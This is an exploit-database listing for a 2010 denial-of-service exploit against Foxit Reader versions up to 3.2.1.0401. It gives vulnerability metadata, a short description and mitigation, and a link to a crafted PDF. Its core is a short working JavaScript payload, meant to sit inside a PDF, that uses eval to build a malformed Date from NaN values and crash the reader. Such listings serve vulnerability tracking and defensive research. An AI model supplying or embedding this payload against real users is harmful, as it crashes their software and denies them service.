header-logo
Suggest Exploit
vendor:
Foxit Reader
by:
juza
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Foxit Reader
Affected Version From: All versions <= 3.2.1.0401
Affected Version To: All versions <= 3.2.1.0401
Patch Exists: Yes
Related CWE: N/A
CPE: a:foxitsoftware:foxit_reader
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3 x32
2010

Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit

Foxit Reader is prone to a denial-of-service vulnerability. An attacker can exploit this issue by enticing an unsuspecting victim to open a specially crafted PDF file. This will cause the application to crash, denying service to legitimate users.

Mitigation:

Users should avoid opening untrusted PDF files. Foxit Reader should be updated to the latest version.
Source

Exploit-DB raw data:

Title: Foxit Reader <= 3.2.1.0401 Denial Of Service Exploit
Date: 05/04/10
Author: juza - iamjuza[at]gmail[dot]com
Software Link: http://www.foxitsoftware.com/pdf/reader/
Version: All versions <= 3.2.1.0401 have the same issue
Tested on: Windows XP SP3 x32
Description: Just open the pdf and click in the button!
Greetz: Yux, Wisezilla, GSO, thanks for all!

Code:

function DoS( pdfDate ) {
eval("new Date(" + new Array(Number.NaN,
Number.NaN).toSource().replace(/[\[\]]/g, "") + ")" );
}

DoS("DoS");


-------------------------

Exploit-DB Mirror: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/12080.pdf

Regards

juza

Navigation

Suggest Exploit

Services By CQR